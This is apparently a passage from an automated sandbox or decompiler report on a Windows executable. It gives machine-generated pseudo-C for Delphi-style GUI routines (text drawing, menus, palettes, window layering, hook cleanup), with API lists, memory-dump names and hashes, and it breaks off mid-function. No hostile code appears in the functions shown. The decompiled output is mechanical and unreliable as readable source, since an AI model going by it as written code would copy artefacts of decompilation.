=  *_t89; 								_t79 =  *(_t89 + 4); 								 *(_t57 + 4) = _t79; 								 *_t79 = _t57; 								 *0x463718 = 0; 								_t58 = VirtualFree(_t89, 0, 0x8000); 								__eflags = _t58 - 1; 								asm("sbb eax, eax"); 								return _t58; 							} 						} else { 							 *(_t87 - 4) = _t69 + 3; 							 *(_t87 - 8 + _t69) = _t69; 							E004015FC(_t87, _t76, _t69); 							 *0x463718 = 0; 							__eflags = 0; 							return 0; 						} 					} else { 						__eflags = __eax; 						 *(__edx + 8) = __ecx; 						 *(__ecx - 4) = __eax; 						if(__eflags == 0) { 							__ecx =  *(__ebx + 4); 							 *(__edx + 0x14) = __ebx; 							 *(__edx + 4) = __ecx; 							 *(__ecx + 0x14) = __edx; 							 *(__ebx + 4) = __edx; 							 *__ebx = 0; 							__eax = 0; 							__eflags = 0; 							_pop(__ebx); 							return 0; 						} else { 							__eax = 0; 							__eflags = 0; 							 *__ebx = __al; 							_pop(__ebx); 							return 0; 						} 					} 				} 			}                        

                                                                            0x00000000
                                                                            0x00401c33
                                                                            0x00000000
                                                                            0x00401c23
                                                                            0x00401c04
                                                                            0x00401ba3
                                                                            0x00401ba3
                                                                            0x00401ba3
                                                                            0x00401ba3
                                                                            0x00401ba7
                                                                            0x00401baa
                                                                            0x00401bd8
                                                                            0x00401bda
                                                                            0x00401bef
                                                                            0x00401bef
                                                                            0x00401bdc
                                                                            0x00401bdc
                                                                            0x00401bdf
                                                                            0x00401be2
                                                                            0x00401be5
                                                                            0x00401be8
                                                                            0x00401bea
                                                                            0x00401bed
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00401bed
                                                                            0x00401bf2
                                                                            0x00401bf4
                                                                            0x00401bf6
                                                                            0x00401bf9
                                                                            0x00401c71
                                                                            0x00401c74
                                                                            0x00401c76
                                                                            0x00401c78
                                                                            0x00401c79
                                                                            0x00401c7b
                                                                            0x00401c38
                                                                            0x00401c38
                                                                            0x00401c3d
                                                                            0x00401c45
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00401c49
                                                                            0x00401c4e
                                                                            0x00401c53
                                                                            0x00401c5b
                                                                            0x00401c5f
                                                                            0x00000000
                                                                            0x00401c5f
                                                                            0x00000000
                                                                            0x00401c5b
                                                                            0x00401c38
                                                                            0x00401c7d
                                                                            0x00401c7d
                                                                            0x00401c85
                                                                            0x00401c89
                                                                            0x00401cc0
                                                                            0x00401cc3
                                                                            0x00401cc6
                                                                            0x00401cc8
                                                                            0x00401cce
                                                                            0x00401cd0
                                                                            0x00401cd0
                                                                            0x00401c8b
                                                                            0x00401c8b
                                                                            0x00401c8b
                                                                            0x00401c8e
                                                                            0x00401c8e
                                                                            0x00401c92
                                                                            0x00401c96
                                                                            0x00401cd8
                                                                            0x00401cdb
                                                                            0x00401cdd
                                                                            0x00401cdf
                                                                            0x00401ce5
                                                                            0x00401ce9
                                                                            0x00401ce9
                                                                            0x00401ce5
                                                                            0x00401c98
                                                                            0x00401c9e
                                                                            0x00401cf0
                                                                            0x00401cfa
                                                                            0x00401d28
                                                                            0x00401d2e
                                                                            0x00401d33
                                                                            0x00401d3a
                                                                            0x00401d44
                                                                            0x00401d4a
                                                                            0x00401d51
                                                                            0x00401d55
                                                                            0x00401cfc
                                                                            0x00401cfc
                                                                            0x00401cff
                                                                            0x00401d01
                                                                            0x00401d04
                                                                            0x00401d07
                                                                            0x00401d09
                                                                            0x00401d18
                                                                            0x00401d1d
                                                                            0x00401d20
                                                                            0x00401d24
                                                                            0x00401d24
                                                                            0x00401ca0
                                                                            0x00401ca3
                                                                            0x00401ca6
                                                                            0x00401cae
                                                                            0x00401cb3
                                                                            0x00401cba
                                                                            0x00401cbe
                                                                            0x00401cbe
                                                                            0x00401bac
                                                                            0x00401bac
                                                                            0x00401bae
                                                                            0x00401bb4
                                                                            0x00401bb7
                                                                            0x00401bc0
                                                                            0x00401bc3
                                                                            0x00401bc6
                                                                            0x00401bc9
                                                                            0x00401bcc
                                                                            0x00401bcf
                                                                            0x00401bd2
                                                                            0x00401bd2
                                                                            0x00401bd4
                                                                            0x00401bd5
                                                                            0x00401bb9
                                                                            0x00401bb9
                                                                            0x00401bb9
                                                                            0x00401bbb
                                                                            0x00401bbd
                                                                            0x00401bbe
                                                                            0x00401bbe
                                                                            0x00401bb7
                                                                            0x00401baa

                                                                            APIs
                                                                            • Sleep.KERNEL32(00000000,?,?,00000000,004020E0), ref: 00401C13
                                                                            • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,004020E0), ref: 00401C2D
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            • Opcode ID: 1e7206aa02f44caa39bbd2ffb76f0b3617e92c3f79faf1de15c14edde19f57f3
                                                                            • Instruction ID: 15b0095f43085506295c4366a214112c8c682c56cb7411fb19f3a5050c217c1f
                                                                            • Opcode Fuzzy Hash: 1e7206aa02f44caa39bbd2ffb76f0b3617e92c3f79faf1de15c14edde19f57f3
                                                                            • Instruction Fuzzy Hash: E151F3B12043809FE715CF28C984716BBD0AF45315F2881BFE444AB3E2E7B8D945C79A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 87%
E004303E4(void* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, int _a4, char _a8, struct tagRECT* _a12) {
    int _v8;
    intOrPtr _v12;
    intOrPtr _v16;
    struct tagRECT _v32;
    void* _t53;
    CHAR* _t63;
    void* _t74;
    void* _t76;
    CHAR* _t87;
    int _t113;
    intOrPtr _t123;
    void* _t135;
    int _t136;
    int _t137;
    int _t139;
    int* _t140;
    void* _t144;
    char _t153;

    _t116 = __ecx;
    _t143 = _t144;
    _v8 = 0;
    _v16 = __ecx;
    _v12 = __edx;
    _t135 = __eax;
    _t113 = _a4;
    _push(_t144);
    _push(0x4305d0);
    _push( *[fs:eax]);
    *[fs:eax] = _t144 + 0xffffffe4;
    _t53 = E00432460(__eax);
    _t131 = _t53;
    if(_t53 != 0 && E00433CE0(_t131) != 0) {
        if((_t113 & 0x00000000) != 0) {
            __eflags = (_t113 & 0x00000002) - 2;
            if((_t113 & 0x00000002) == 2) {
                _t113 = _t113 & 0xfffffffd;
                __eflags = _t113;
            }
        } else {
            _t113 = _t113 & 0xffffffff | 0x00000002;
        }
        _t113 = _t113 | 0x00020000;
    }
    E004047D4( &_v8, _v16);
    if((_t113 & 0x00000004) == 0) {
        L12:
        E00404B4C(_v8, 0x4305f4);
        if(_t153 != 0) {
            E004262A4( *((intOrPtr*)(_v12 + 0x14)), _t116, 1, _t131, _t143, __eflags);
            __eflags =  *((char*)(_t135 + 0x3a));
            if( *((char*)(_t135 + 0x3a)) != 0) {
                _t132 =  *((intOrPtr*)(_v12 + 0xc));
                __eflags = E00425C4C( *((intOrPtr*)(_v12 + 0xc))) |  *0x4305f8;
                E00425C58( *((intOrPtr*)(_v12 + 0xc)), E00425C4C( *((intOrPtr*)(_v12 + 0xc))) |  *0x4305f8, _t132, _t135, _t143);
            }
            __eflags =  *((char*)(_t135 + 0x39));
            if( *((char*)(_t135 + 0x39)) != 0) {
                L26:
                _t136 = _v8;
                __eflags = _t136;
                if(_t136 != 0) {
                    _t137 = _t136 - 4;
                    __eflags = _t137;
                    _t136 =  *_t137;
                }
                _t63 = E00404C00(_v8);
                DrawTextA(E0042681C(_v12), _t63, _t136, _a12, _t113);
                L29:
                _pop(_t123);
                *[fs:eax] = _t123;
                _push(0x4305d7);
                return E0040473C( &_v8);
            } else {
                __eflags = _a8;
                if(_a8 == 0) {
                    OffsetRect(_a12, 1, 1);
                    E004258CC( *((intOrPtr*)(_v12 + 0xc)), 0xff000014);
                    _t139 = _v8;
                    __eflags = _t139;
                    if(_t139 != 0) {
                        _t140 = _t139 - 4;
                        __eflags = _t140;
                        _t139 =  *_t140;
                    }
                    _t87 = E00404C00(_v8);
                    DrawTextA(E0042681C(_v12), _t87, _t139, _a12, _t113);
                    OffsetRect(_a12, 0xffffffff, 0xffffffff);
                }
                __eflags = _a8;
                if(_a8 == 0) {
                    L25:
                    E004258CC( *((intOrPtr*)(_v12 + 0xc)), 0xff000010);
                } else {
                    _t74 = E00425400(0xff00000d);
                    _t76 = E00425400(0xff000010);
                    __eflags = _t74 - _t76;
                    if(_t74 != _t76) {
                        goto L25;
                    }
                    E004258CC( *((intOrPtr*)(_v12 + 0xc)), 0xff000014);
                }
                goto L26;
            }
        }
        if((_t113 & 0x00000004) == 0) {
            asm("movsd");
            asm("movsd");
            asm("movsd");
            asm("movsd");
            _v32.top = _v32.top + 4;
            DrawEdge(E0042681C(_v12),  &_v32, 6, "true");
        }
        goto L29;
    } else {
        if(_v8 == 0) {
            L11:
            E00404A08( &_v8, 0x4305e8);
            goto L12;
        }
        if( *_v8 != 0x26) {
            goto L12;
        }
        _t153 =  *((char*)(_v8 + 1));
        if(_t153 != 0) {
            goto L12;
        }
        goto L11;
    }
}


                                                                            APIs
                                                                            • DrawEdge.USER32(00000000,?,00000006,?), ref: 004304B3
                                                                            • OffsetRect.USER32(?,00000001,00000001), ref: 00430504
                                                                            • DrawTextA.USER32(00000000,00000000,?,?,?), ref: 0043053D
                                                                            • OffsetRect.USER32(?,000000FF,000000FF), ref: 0043054A
                                                                            • DrawTextA.USER32(00000000,00000000,?,?,?), ref: 004305B5
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Draw$OffsetRectText$Edge
                                                                            • String ID:
                                                                            • API String ID: 3610532707-0
                                                                            • Opcode ID: a5c1db12bf0ac30249b93611e375069da9dd1bc870eb88bb1d58e4da80817d54
                                                                            • Instruction ID: 3dcdb83b52eea41a6f7c2ae4f71efb06fc793ff540cda049268810552e419287
                                                                            • Opcode Fuzzy Hash: a5c1db12bf0ac30249b93611e375069da9dd1bc870eb88bb1d58e4da80817d54
                                                                            • Instruction Fuzzy Hash: E451B770A00214AFDB10EB69C891B9FB7A5AF08324F55526BF914A7392C77CEE408B59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E00430224(int __eax, void* __edx) {
    signed int _t39;
    signed int _t40;
    intOrPtr _t44;
    int _t46;
    int _t47;
    intOrPtr* _t48;

    _t18 = __eax;
    _t48 = __eax;
    if(( *(__eax + 0x1c) & 0x00000008) == 0) {
        if(( *(__eax + 0x1c) & 0x00000002) != 0) {
            *((char*)(__eax + 0x74)) = 1;
            return __eax;
        }
        _t19 =  *((intOrPtr*)(__eax + 0x6c));
        if( *((intOrPtr*)(__eax + 0x6c)) != 0) {
            return E00430224(_t19, __edx);
        }
        _t18 = GetMenuItemCount(E00430354(__eax));
        _t47 = _t18;
        _t40 = _t39 & 0xffffff00 | _t47 == 0x00000000;
        while(_t47 > 0) {
            _t46 = _t47 - 1;
            _t18 = GetMenuState(E00430354(_t48), _t46, 0x400);
            if((_t18 & 0x00000004) == 0) {
                _t18 = RemoveMenu(E00430354(_t48), _t46, 0x400);
                _t40 = 1;
            }
            _t47 = _t47 - 1;
        }
        if(_t40 != 0) {
            if( *((intOrPtr*)(_t48 + 0x64)) != 0) {
                L14:
                E004300E4(_t48);
                L15:
                return  *((intOrPtr*)( *_t48 + 0x3c))();
            }
            _t44 =  *0x42eccc; // 0x42ed18
            if(E00403AB4( *((intOrPtr*)(_t48 + 0x70)), _t44) == 0 || GetMenuItemCount(E00430354(_t48)) != 0) {
                goto L14;
            } else {
                DestroyMenu( *(_t48 + 0x34));
                *(_t48 + 0x34) = 0;
                goto L15;
            }
        }
    }
    return _t18;
}


                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6868910fa89a8018b263f99a25884595e32ff1315658f09768cdbd9cf83d8de8
                                                                            • Instruction ID: a3695b4b82a7dda22394f8c72c2d1be36efbcd0d540cfdc55166254eebed839c
                                                                            • Opcode Fuzzy Hash: 6868910fa89a8018b263f99a25884595e32ff1315658f09768cdbd9cf83d8de8
                                                                            • Instruction Fuzzy Hash: E511A521B002495ADB20AA7B8929B5B27885F4970CF0422ABBD11A7393CA3CCC09C75C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E004297F8(int __eax) {
    int _t21;
    signed int _t29;
    char _t34;
    int _t42;
    int _t43;
    struct HDC__* _t44;
    intOrPtr _t45;

    _t21 = __eax;
    _t42 = __eax;
    _t45 =  *((intOrPtr*)(__eax + 0x28));
    if( *((char*)(__eax + 0x30)) == 0 &&  *(_t45 + 0x10) == 0 &&  *((intOrPtr*)(_t45 + 0x14)) != 0) {
        _t22 =  *((intOrPtr*)(_t45 + 0x14));
        if( *((intOrPtr*)(_t45 + 0x14)) ==  *((intOrPtr*)(_t45 + 8))) {
            E0042824C(_t22);
        }
        _t21 = E0042730C( *((intOrPtr*)(_t45 + 0x14)), 1 << ( *(_t45 + 0x3e) & 0x0000ffff));
        _t43 = _t21;
        *(_t45 + 0x10) = _t43;
        if(_t43 == 0) {
            _t44 = E00426C14(GetDC(0));
            if( *((char*)(_t45 + 0x71)) != 0) {
                L9:
                _t34 = 1;
            } else {
                _t29 = GetDeviceCaps(_t44, 0xc);
                if(_t29 * GetDeviceCaps(_t44, 0xe) < ( *(_t45 + 0x2a) & 0x0000ffff) * ( *(_t45 + 0x28) & 0x0000ffff)) {
                    goto L9;
                } else {
                    _t34 = 0;
                }
            }
            *((char*)(_t45 + 0x71)) = _t34;
            if(_t34 != 0) {
                *(_t45 + 0x10) = CreateHalftonePalette(_t44);
            }
            _t21 = ReleaseDC(0, _t44);
            if( *(_t45 + 0x10) == 0) {
                *((char*)(_t42 + 0x30)) = 1;
                return _t21;
            }
        }
    }
    return _t21;
}


                                                                            APIs
                                                                            • GetDC.USER32(00000000), ref: 0042984E
                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00429863
                                                                            • GetDeviceCaps.GDI32(00000000,0000000E), ref: 0042986D
                                                                            • CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00428423,00000000,004284AF), ref: 00429891
                                                                            • ReleaseDC.USER32 ref: 0042989C
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CapsDevice$CreateHalftonePaletteRelease
                                                                            • String ID:
                                                                            • API String ID: 2404249990-0
                                                                            • Opcode ID: 3865229444c542543eb940fc4c11deb8b2b846e1a53becbdafc0675224900ef4
                                                                            • Instruction ID: ad4f96e05be2536000db3a933fed08fd47ceb8b130526fe63b94d72f1acf08c5
                                                                            • Opcode Fuzzy Hash: 3865229444c542543eb940fc4c11deb8b2b846e1a53becbdafc0675224900ef4
                                                                            • Instruction Fuzzy Hash: DD11B4217152B99AEB24FF25A8817EE36D0AF42355F48012BFC406B2C1D7B98C94C2B9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 88%
E00453CD8(void* __eax) {
    void* _t16;
    void* _t38;
    signed int _t40;

    _t16 = __eax;
    _t38 = __eax;
    if(( *(__eax + 0x1c) & 0x00000010) == 0 &&  *0x4626bc != 0) {
        _t16 = E004426F4(__eax);
        if(_t16 != 0) {
            _t40 = GetWindowLongA(E004423F8(_t38), 0xffffffec);
            if( *(_t38 + 0x328) != 0 ||  *(_t38 + 0x350) != 0) {
                if((_t40 & 0x00080000) == 0) {
                    SetWindowLongA(E004423F8(_t38), 0xffffffec, _t40 | 0x00080000);
                }
                return  *0x4626bc(E004423F8(_t38),  *((intOrPtr*)(_t38 + 0x354)),  *(_t38 + 0x329) & 0x000000ff,  *(0x46274c + ( *(_t38 + 0x328) & 0x000000ff) * 4) |  *(0x462754 + ( *(_t38 + 0x350) & 0x000000ff) * 4));
            } else {
                SetWindowLongA(E004423F8(_t38), 0xffffffec, _t40 & 0xfff7ffff);
                return RedrawWindow(E004423F8(_t38), 0, 0, 0x485);
            }
        }
    }
    return _t16;
}


                                                                            APIs
                                                                            • GetWindowLongA.USER32 ref: 00453D0C
                                                                            • SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 00453D3E
                                                                            • SetLayeredWindowAttributes.USER32(00000000,?,?,00000000,00000000,000000EC,?,?,0045143C), ref: 00453D77
                                                                            • SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 00453D90
                                                                            • RedrawWindow.USER32(00000000,00000000,00000000,00000485,00000000,000000EC,00000000,00000000,000000EC,?,?,0045143C), ref: 00453DA6
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Window$Long$AttributesLayeredRedraw
                                                                            • String ID:
                                                                            • API String ID: 1758778077-0
                                                                            • Opcode ID: a167b8226a367de4a078897bccef434779ea8f70462ce2f86b559be6c3f23891
                                                                            • Instruction ID: 2f97fc831ddea0b8c0e421ebb8e19b8b50e61007e8c28567c32a4e0cf3139f72
                                                                            • Opcode Fuzzy Hash: a167b8226a367de4a078897bccef434779ea8f70462ce2f86b559be6c3f23891
                                                                            • Instruction Fuzzy Hash: 06110160A047902BDB11AF794D85F5626BC1B0536BF0805BABC55EA2C3CAACCA0CC768
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 70%
E00427274(void* __eax) {
    signed int _v5;
    struct HDC__* _v12;
    struct HPALETTE__* _t21;
    struct HPALETTE__* _t25;
    void* _t28;
    intOrPtr _t35;
    void* _t37;
    void* _t39;
    intOrPtr _t40;

    _t37 = _t39;
    _t40 = _t39 + 0xfffffff8;
    _t28 = __eax;
    _v5 = 0;
    if( *0x46634c == 0) {
        return _v5 & 0x000000ff;
    } else {
        _v12 = GetDC(0);
        _push(_t37);
        _push(0x4272fa);
        _push( *[fs:edx]);
        *[fs:edx] = _t40;
        if(GetDeviceCaps(_v12, 0x68) >= 0x10) {
            _t21 =  *0x46634c; // 0x7a080b2a
            GetPaletteEntries(_t21, 0, 8, _t28 + 4);
            _t25 =  *0x46634c; // 0x7a080b2a
            GetPaletteEntries(_t25, 8, 8, _t28 + ( *(_t28 + 2) & 0x0000ffff) * 4 - 0x1c);
            _v5 = 1;
        }
        _pop(_t35);
        *[fs:eax] = _t35;
        _push(0x427301);
        return ReleaseDC(0, _v12);
    }
}


                                                                            APIs
                                                                            • GetDC.USER32(00000000), ref: 0042728C
                                                                            • GetDeviceCaps.GDI32(?,00000068), ref: 004272A8
                                                                            • GetPaletteEntries.GDI32(7A080B2A,00000000,00000008,?), ref: 004272C0
                                                                            • GetPaletteEntries.GDI32(7A080B2A,00000008,00000008,?), ref: 004272D8
                                                                            • ReleaseDC.USER32 ref: 004272F4
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: EntriesPalette$CapsDeviceRelease
                                                                            • String ID:
                                                                            • API String ID: 3128150645-0
                                                                            • Opcode ID: ac1bfe70cc136cd0b1c148b7d32caf684ac8a85d6e8810b4e931f31978cb02c9
                                                                            • Instruction ID: fcbf177f7b8efaa1d200cff961121ff1be4b86295971eaf25a38603dbf7197bd
                                                                            • Opcode Fuzzy Hash: ac1bfe70cc136cd0b1c148b7d32caf684ac8a85d6e8810b4e931f31978cb02c9
                                                                            • Instruction Fuzzy Hash: C1112B3164C304BEFB04DBE59C42F6D77E8E705704F41C0AAFA44EA2C1DABA9444C729
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 64%
E0040BBE0(void* __esi, void* __eflags) {
    char _v8;
    intOrPtr* _t18;
    intOrPtr _t26;
    void* _t27;
    long _t29;
    intOrPtr _t32;
    void* _t33;

    _t33 = __eflags;
    _push(0);
    _push(_t32);
    _push(0x40bc77);
    _push( *[fs:eax]);
    *[fs:eax] = _t32;
    E0040B954(GetThreadLocale(), 0x40bc8c, 0x100b,  &_v8);
    _t29 = E00408B44(0x40bc8c, 1, _t33);
    if(_t29 + 0xfffffffd - 3 < 0) {
        EnumCalendarInfoA(E0040BB2C, GetThreadLocale(), _t29, 4);
        _t27 = 7;
        _t18 = 0x4658f4;
        do {
            *_t18 = 0xffffffff;
            _t18 = _t18 + 4;
            _t27 = _t27 - 1;
        } while (_t27 != 0);
        EnumCalendarInfoA(E0040BB68, GetThreadLocale(), _t29, 3);
    }
    _pop(_t26);
    *[fs:eax] = _t26;
    _push(E0040BC7E);
    return E0040473C( &_v8);
}


                                                                            APIs
                                                                            • GetThreadLocale.KERNEL32(?,00000000,0040BC77,?,?,00000000), ref: 0040BBF8
                                                                              • Part of subcall function 0040B954: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040B972
                                                                            • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040BC77,?,?,00000000), ref: 0040BC28
                                                                            • EnumCalendarInfoA.KERNEL32(Function_0000BB2C,00000000,00000000,00000004), ref: 0040BC33
                                                                            • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040BC77,?,?,00000000), ref: 0040BC51
                                                                            • EnumCalendarInfoA.KERNEL32(Function_0000BB68,00000000,00000000,00000003), ref: 0040BC5C
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Locale$InfoThread$CalendarEnum
                                                                            • String ID:
                                                                            • API String ID: 4102113445-0
                                                                            • Opcode ID: 97d354d8b6cdc2396397ecc49eed239671b501c3797063cbf2a75c35dab51ed0
                                                                            • Instruction ID: 22d4ad3a48fad1cbf9e27e67077bea737ce6d0b3631ad7d1c133fb8823499fa8
                                                                            • Opcode Fuzzy Hash: 97d354d8b6cdc2396397ecc49eed239671b501c3797063cbf2a75c35dab51ed0
                                                                            • Instruction Fuzzy Hash: 7E012F717442446BE601B7758D03F2A366CDB86718F61403BB900FA6C9DB3CAE1086AC
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                                                                                  E00455410() { 				void* _t2; 				void* _t5; 				void* _t8; 				struct HHOOK__* _t10;  				if( *0x466598 != 0) { 					_t10 =  *0x466598; // 0x0 					UnhookWindowsHookEx(_t10); 				} 				 *0x466598 = 0; 				if( *0x46659c != 0) { 					_t2 =  *0x466594; // 0x0 					SetEvent(_t2); 					if(GetCurrentThreadId() !=  *0x466590) { 						_t8 =  *0x46659c; // 0x0 						WaitForSingleObject(_t8, 0xffffffff); 					} 					_t5 =  *0x46659c; // 0x0 					CloseHandle(_t5); 					 *0x46659c = 0; 					return 0; 				} 				return 0; 			}                        


                                                                            APIs
                                                                            • UnhookWindowsHookEx.USER32(00000000), ref: 0045541F
                                                                            • SetEvent.KERNEL32(00000000,00457DAE,00000000,00456B7B,?,?,00460C02,00000001,00456D41,?,00000000,00000000,00000000,00000001), ref: 0045543A
                                                                            • GetCurrentThreadId.KERNEL32 ref: 0045543F
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00457DAE,00000000,00456B7B,?,?,00460C02,00000001,00456D41,?,00000000,00000000,00000000,00000001), ref: 00455454
                                                                            • CloseHandle.KERNEL32(00000000,00000000,00457DAE,00000000,00456B7B,?,?,00460C02,00000001,00456D41,?,00000000,00000000,00000000,00000001), ref: 0045545F
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
                                                                            • String ID:
                                                                            • API String ID: 2429646606-0
                                                                            • Opcode ID: 8d4b083acdc61fb605ee7809ee2f04c3fef8837cea9ec92acbb126d3f3c8ffb3
                                                                            • Instruction ID: c8276ee7c81c26c9bfae65dd25605525a1fe353da67a80127bb571263e38ba24
                                                                            • Opcode Fuzzy Hash: 8d4b083acdc61fb605ee7809ee2f04c3fef8837cea9ec92acbb126d3f3c8ffb3
                                                                            • Instruction Fuzzy Hash: 50F0F870510580BACA10EF69BC47B1532E4A70D316B124A3AF00AD71EBE7B9B484CF1E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 84%
                                                                                                                                  E00458030(char __eax, void* __ebx, void* __edx, void* __edi, void* __esi) { 				char _v8; 				intOrPtr _v12; 				char _v16; 				intOrPtr _v20; 				struct HWND__* _v24; 				intOrPtr _v28; 				char _v32; 				struct tagRECT _v48; 				intOrPtr _v52; 				intOrPtr _v56; 				int _v60; 				int _v64; 				intOrPtr _v68; 				char _v72; 				int _v76; 				char _v80; 				intOrPtr _v84; 				intOrPtr _v88; 				struct tagPOINT _v96; 				char _v97; 				struct tagRECT _v113; 				char _v132; 				intOrPtr _v136; 				char _v140; 				char _v144; 				char _v148; 				struct HWND__* _t131; 				void* _t145; 				struct HWND__* _t167; 				intOrPtr _t188; 				char _t194; 				intOrPtr _t218; 				intOrPtr _t222; 				void* _t238; 				intOrPtr* _t250; 				intOrPtr _t269; 				intOrPtr _t271; 				intOrPtr _t276; 				struct tagRECT* _t298; 				intOrPtr* _t302; 				intOrPtr _t303; 				void* _t310;  				_t309 = _t310; 				_push(__ebx); 				_push(__esi); 				_push(__edi); 				_t251 = 0; 				_v144 = 0; 				_v148 = 0; 				asm("movsd"); 				asm("movsd"); 				_v8 = __eax; 				_t268 =  *0x44c7e8; // 0x44c7ec 				E004051D8( &_v72, _t268); 				_t250 =  &_v8; 				_push(_t310); 				_push(0x4583b7); 				_push( *[fs:eax]); 				 *[fs:eax] = _t310 + 0xffffff70; 				 *((char*)( *_t250 + 0x58)) = 0; 				_v24 = 0; 				if( *((char*)( *_t250 + 0x88)) == 0 ||  *((intOrPtr*)( *_t250 + 0x60)) == 0 || E0044CBE4() == 0) { 					L23: 					_t131 = _v24; 					__eflags = _t131; 					if(_t131 <= 0) { 						E00457D90( *_t250, _t251, _t268); 					} else { 						E00457B58( *_t250, 0, _t131); 					} 					goto L26; 				} else { 					_t145 = E00455288(E00438F94( &_v80, 1)); 					_t268 =  *_t250; 					if(_t145 !=  *((intOrPtr*)( *_t250 + 0x60))) { 						goto L23; 					} else { 						_v72 =  *((intOrPtr*)( *_t250 + 0x60)); 						_v64 = _v80; 						_v60 = _v76; 						_v60 = _v60 + E00457DC8(); 						_v56 = 